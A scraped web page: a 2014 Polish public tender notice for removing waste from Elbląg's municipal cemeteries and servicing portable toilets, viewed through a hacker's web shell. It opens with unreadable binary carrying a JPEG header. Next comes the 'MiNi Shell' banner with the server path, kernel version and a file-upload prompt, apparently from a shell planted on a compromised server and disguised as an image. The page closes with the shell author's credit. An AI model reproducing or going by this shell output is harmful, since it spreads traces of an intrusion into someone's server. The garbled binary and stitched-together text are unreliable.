JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141210/405032-N-2014.html

<p class="kh_header"><b>Elbląg: WYWÓZ ODPADÓW STAŁYCH I PŁYNNYCH POCHODZĄCYCH Z CMENTARZY KOMUNALNYCH W ELBLĄGU ORAZ OBIEKTÓW NALEŻĄCYCH  DO  ZARZĄDU  ZIELENI   MIEJSKIEJ  W  ELBLĄGU ORAZ OBSŁUGA TOALET PRZENOŚNYCH</b><br>
<b>Numer ogłoszenia: 405032 - 2014; data zamieszczenia: 10.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Zieleni Miejskiej w Elblągu , ul. Krakusa 13-16, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 234 10 75, faks 55 234 15 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zzm.elblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYWÓZ ODPADÓW STAŁYCH I PŁYNNYCH POCHODZĄCYCH Z CMENTARZY KOMUNALNYCH W ELBLĄGU ORAZ OBIEKTÓW NALEŻĄCYCH  DO  ZARZĄDU  ZIELENI   MIEJSKIEJ  W  ELBLĄGU ORAZ OBSŁUGA TOALET PRZENOŚNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot i zakres części pierwszej zamówienia. 
1)	Przedmiotem części pierwszej zamówienia jest usługa polegająca na wywozie stałych nieczystości komunalnych z terenu cmentarzy komunalnych w Elblągu: Agrykola zlokalizowanego przy  ul. Agrykola 23, Dębica zlokalizowanego przy ul. Łęczyckiej 49 w Elblągu oraz obiektów należących do Zarządu Zieleni Miejskiej w Elblągu zlokalizowanych przy ul. Krakusa 13 - 16, ul. Marymonckiej 7, ul. Sadowej 1-3 oraz ze Szkółki Drzew i Krzewów Ozdobnych w Gronowie Górnym przy ul. Agatowej 50. Wykonawca na czas trwania umowy odda do dyspozycji Zamawiającego pojemniki i kontenery w ilościach określonych poniżej. Wskazane ilości i pojemności poszczególnych pojemników są orientacyjne. Zamawiający przewiduje możliwość zmian zarówno ich ilości jak i pojemności w zależności od zapotrzebowania. Wykonawca będzie także opróżniał pojemniki na odpady segregowane będące własnością Zamawiającego ustawione na Terenie cmentarzy komunalnych.
2)	Zakresem części pierwszej zamówienia jest:
a)	Ustawienie na terenie cmentarza komunalnego Agrykola w Elblągu, w miejscach wskazanych przez Zamawiającego, pojemników i kontenerów odkrytych przystosowanych do składania stałych odpadów komunalnych powstających na terenie tego cmentarza. Ilość i pojemność pojemników i kontenerów odkrytych, którą należy przewidzieć dla tego cmentarza przedstawia się  następująco:
pojemniki o pojemności 1,1 m3 - 60 szt. 
pojemniki o pojemności 0,24 m3  - 12 szt.
pojemnik zamykany o pojemności 10 m3 - 1szt. w okresie październik - listopad (sprzątanie liści)
     Wskazane ilości i pojemności poszczególnych pojemników są orientacyjne, Zamawiający przewiduje możliwość zmian zarówno ich ilości jak i pojemności w zależności od zapotrzebowania.
Wywóz odpadów, opróżnianie kontenerów na odpady nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 6 godzin od zgłoszenia, również w dni świąteczne i wolne od pracy
Dbanie o stan sanitarny, techniczny i estetyczny pojemników i kontenerów.
Wykonawca na wezwanie Zamawiającego w ciągu 6 godzin od zgłoszenia, również w dni świąteczne i wolne od pracy będzie opróżniał 22 szt. pojemników do selektywnej zbiórki odpadów ustawionych przez Zamawiającego
Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników i kontenerów po ich opróżnieniu.
Wykonawca uzyska potwierdzenia wykonanej usługi przez administratora cmentarza.
Wykonawca żąda wskazania części zamówienia, którą Wykonawca powierzy Podwykonawcy
b) Ustawienie na terenie cmentarza komunalnego Dębica w Elblągu, w miejscach wskazanych przez Zamawiającego, pojemników i kontenerów odkrytych przystosowanych do składania stałych odpadów komunalnych powstających na terenie tego cmentarza. Ilość i pojemność pojemników i kontenerów odkrytych, którą należy przewidzieć dla tego cmentarza przedstawia się następująco:
kontenery o pojemności 10 m3 - 20 szt. przez cały okres trwania umowy, dodatkowe   3szt. od 20       października do 3 listopada, oznaczone metodą numeracji
pojemniki o pojemności 1,1 m3 - 130 szt.
pojemniki o pojemności 7m3 do składowania gruzu - 3 szt. (2szt. przez cały okres trwania umowy, 1szt. 
dodatkowo od 30 kwietnia do 31 października) 
pojemniki o pojemności 0,24 m3  - 20 szt.
Wskazane ilości i pojemności poszczególnych pojemników są orientacyjne, Zamawiający przewiduje możliwość zmian zarówno ich ilości jak i pojemności w zależności od zapotrzebowania.
Wywóz odpadów, opróżnianie kontenerów na odpady nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 6 godzin od zgłoszenia, również w dni świąteczne i wolne od pracy.
Dbanie o stan sanitarny, techniczny i estetyczny pojemników i kontenerów.
Wykonawca na wezwanie Zamawiającego w ciągu 6 godzin od zgłoszenia, również w dni świąteczne i wolne od pracy będzie opróżniał 68 szt. pojemników do selektywnej zbiórki odpadów ustawionych  przez zamawiającego
Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników i kontenerów po ich opróżnieniu.
Wykonawca uzyska potwierdzenia wykonanej usługi przez administratora cmentarza.
Wykonawca żąda wskazania części zamówienia, którą Wykonawca powierzy Podwykonawcy.
c)	Ustawienie na terenie przyległym do budynków przy ul. Krakusa 13-16, Marymonckiej 7, Sadowej 1 - 3 i przy Szkółce Drzew i Krzewów Ozdobnych w Gronowie Górnym ul. Agatowa 50 w miejscach wskazanych przez Zamawiającego pojemników przystosowanych do składania stałych odpadów komunalnych. Ilość i pojemność pojemników, którą należy przewidzieć dla tych lokalizacji przedstawia się następująco:
ul. Marymoncka 7: pojemniki o pojemności 1,1 m3 - 2szt
ul. Krakusa 13 - 16: pojemniki o pojemności 1,1 m3 - 1szt, pojemnik do selektywnej zbiórki odpadów 
ul. Sadowa 1 - 3 : pojemnik o pojemności 1,1 m3 - 1szt
Gronowo Elbląskie ul. Agatowa 50 : pojemnik o pojemności 1,1 m3 - 1szt
Wywóz odpadów nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 6 godzin od zgłoszenia, również w dni świąteczne
Dbanie o stan sanitarny, techniczny i estetyczny pojemników 
Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników po ich opróżnieniu.
3)   Wykonawca ma obowiązek zapoznać się z położeniem cmentarzy komunalnych w Elblągu, rozkładem dróg na ich terenie , oraz lokalizacją obiektów należących do Zamawiającego objętych przedmiotem zamówienia. 
4)	 Zamawiający nie ponosi odpowiedzialności za uszkodzenia pojemników na odpady należące do wykonawcy.
5)	 Wykonawca zobowiązany jest do świadczenia usług własnymi środkami transportu oraz urządzeniami.
6)	Szacowana  ilość odpadów do wywiezienia w trakcie trwania niniejszej umowy wynosi:
a)	 odpady komunalne zmieszane łącznie 750 ton
b)	 odpady segregowane łącznie 118 ton
c)	gruz 332 ton

2.	Przedmiot i zakres części drugiej zamówienia. 
1)	Przedmiotem części drugiej zamówienia jest usługa polegająca na ustawieniu i obsłudze przenośnych kabin WC nie podłączanych do instalacji zewnętrznych oraz wywozie nieczystości płynnych z 2 szamb zlokalizowanych przy Wydziale Administracji Cmentarzy Zarządu Zieleni Miejskiej w Elblągu ul. Łęczycka 49 w Elblągu oraz 1 szamba zlokalizowanego na terenie Szkółki Drzew i Krzewów przy ul. Agatowej 50 w Gronowie Górnym w łącznej szacunkowej ilości 583m3
2)	Zakresem części drugiej zamówienia jest:
a)	 Ustawienie na Cmentarzu Agrykola przez cały okres trwania umowy 2 szt. toalet - serwis w okresie od 30 kwietnia do 22 października 2 razy w tygodniu - poniedziałki i czwartki,  w pozostałym okresie raz w tygodniu - w poniedziałki. W okresie 23 października do 02 listopada (Święto Zmarłych) ustawienie 8 szt. kabin w tym 1 dla niepełnosprawnych - serwisy: 23.10, 26.10, 30.10, 31.10, 01.11, 02.11.
b) Ustawienie na Cmentarzu Dębica przez cały okres trwania umowy 3 szt. toalet w tym 1szt. dla niepełnosprawnych, dodatkowo 1szt. w okresie 16.03 - 14.11. serwis w okresie od 30 kwietnia do 22 października 2 razy w tygodniu - poniedziałki i czwartki,  w pozostałym okresie raz w tygodniu - w poniedziałki. W okresie 23 października do 02 listopada (Święto Zmarłych) ustawienie 35szt. kabin w tym 2 dla niepełnosprawnych - serwisy: 23.10, 26.10, 30.10, 31.10, 01.11, 02.11.
c)	Zapewnienie kabin WC z umywalkami w przypadku wystąpienia awarii wodociągowej w siedzibie ZZM w Elblągu w ilości 5szt. przez okres 7 dni - serwis 1 raz dziennie w trakcie trwania niniejszej umowy
d)	wywóz nieczystości płynnych z 2 szamb zlokalizowanych przy Wydziale Administracji Cmentarzy Zarządu Zieleni Miejskiej w Elblągu ul. Łęczycka 49 w Elblągu oraz 1 szamba zlokalizowanego na terenie Szkółki Drzew i Krzewów przy ul. Agatowej 50 w Gronowie Górnym w łącznej szacunkowej ilości 583m3.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających o wartości do 50% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.32.00-8, 90.41.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w dziale VI. pkt 1.1. SIWZ, oraz dokumentów wymienionych w dziale VI. pkt 1.2. oraz
-   posiadanego przez Wykonawcę zezwolenia na prowadzenie działalności gospodarczej w zakresie odbierania 
      odpadów komunalnych zgodnie z ustawą  z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tekst
      jednolity Dz. U. z 2012 r. poz. 391 i 951),  zezwolenie na prowadzenie działalności gospodarczej w zakresie 
      transportu odpadów zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach (tekst jednolity Dz.U. z 2010r. Nr 185, poz. 
     1243 z późn. zm.) oraz posiada aktualną umowę na odbiór lub utylizację odpadów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w dziale VI. pkt 1.1. SIWZ, oraz oraz dokumentów wymienionych w pkt VI. ppkt 1.3. oraz
         -    załączonego przez Wykonawcę wykazu wykonanych głównych usług, w okresie ostatnich trzech lat przed upływem
             terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości,
             przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały
             wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w dziale VI. pkt 1.1. SIWZ, oraz oraz dokumentów wymienionych w pkt VI. ppkt 1.4. oraz    
-	załączonego przez Wykonawcę wykazu pojazdów, których Wykonawca będzie używał wykonując zamówienie 
              Uwaga:  wykaz pojazdów składają Wykonawcy tylko części pierwszej zamówienia!</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w dziale VI. pkt 1.1. SIWZ, oraz oraz dokumentów wymienionych w pkt VI. ppkt 1.4. oraz    
-	załączonego przez Wykonawcę wykazu pojazdów, których Wykonawca będzie używał wykonując zamówienie 
              Uwaga:  wykaz pojazdów składają Wykonawcy tylko części pierwszej zamówienia!</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-      potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. 
               SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Dla potwierdzenia spełnienia warunku wymienionego w dziale V. pkt 2 SIWZ Wykonawca
złoży wykaz 2 wykonanych głównych usług, w okresie ostatnich trzech lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dla części pierwszej zamówienia - wywozu nieczystości o wartości nie mniejszej niż 400 000 zł brutto każda, dla części drugiej zamówienia -  Wykonania usług polegających na obsłudze kabin przenośnych o wartości nie mniejszej niż 30 000 zł brutto każda wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności faktyry - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przekazuje wzór umowy, która będzie zawarta w sprawie zamówienia publicznego, stanowiący ZAŁĄCZNIK NR 3a - dla części pierwszej zamówienia i 3b - dla części drugiej zamówienia do Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zzm.elblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Krakusa 13-16 Elbląg 82-300.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2014 godzina 09:00, miejsce: ul. Krakusa 13-16 Elbląg 82-300 sekretariat, pokój nr 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com